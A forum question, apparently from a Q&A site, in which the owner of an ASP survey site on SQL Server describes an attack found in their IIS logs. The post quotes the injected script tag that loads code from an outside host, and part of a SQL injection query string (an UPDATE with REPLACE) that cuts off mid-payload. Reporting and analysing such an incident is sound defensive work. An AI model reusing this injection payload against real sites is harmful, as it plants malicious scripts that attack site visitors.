Attack on ASP site that uses a SQL server database
问题 We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: XSS Attack on the ASP.NET Website. I found multiple entries in our IIS logs that included the malicious code: < / title> < script src = http : // google-stats49.info/ur.php >. Here is an example of the value of the cs-uri-query field for one of the IIS log entries. surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar